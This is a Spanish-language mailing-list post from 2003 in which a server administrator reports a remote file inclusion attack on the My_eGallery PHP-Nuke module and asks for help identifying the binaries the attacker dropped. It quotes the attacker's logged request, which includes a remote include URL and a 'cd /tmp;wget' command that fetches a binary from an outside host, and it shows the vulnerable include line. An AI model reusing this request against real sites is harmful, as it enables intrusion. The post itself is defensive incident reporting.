[HACK] MyeGallery -- phpnuke

Pedro Pablo pfabrega at arrakis.es
Wed Dec 3 18:00:26 CET 2003


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hola

Parece que el módulo de MyeGallery tiene una vulnerabilidad que permite la
ejecución de órdenes remotas.

access_log.copia:200.103.x.x - - [29/Nov/2003:00:08:52 +0100] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.securebi0s.hpg.com.br/telnetd
HTTP/1.1" 200 1316 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"


en la página destino hay un:

include "$basepath/etc/etc";

Me ha subido un par de ficheros al servidor (por favor, sin pitorreos :-)

www.securebi0s.hpg.com.br/telnetd
www.fud3d8r.blogger.com.br/r0nin

y los ha ejecutado como apache.

Aparentemente no hay nada más, con el tripwire no se ha detectado nada más,
pero ¿tenéis alguna idea de lo que hacen estos programas?


Uno tenía una conexión con: housing10.berlin3.powerweb.de desde mi puerto 3763
al 4599.

La verdad es que lo único que preocupa es que hubieran cogido los nombres de
usuarios para enviar spam, pero no creo que este sea el caso. El resto es
accesible desde la web.

En fin que agradecería cualquier pista sobre estos programas.

Gracias

- -- 
  5:59pm  up 15 days, 18:20, 10 users,  load average: 0.16, 0.15, 0.21
- --------
spam01 at bdat.net
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE/zhatklcfvgVBHFIRAiQzAJ4sarwfPl67eh/wR045qleE5vK8JgCcCVBu
CvSZrGYjjxhIvtUGAztf4sY=
=KiLu
-----END PGP SIGNATURE-----





More information about the hacking mailing list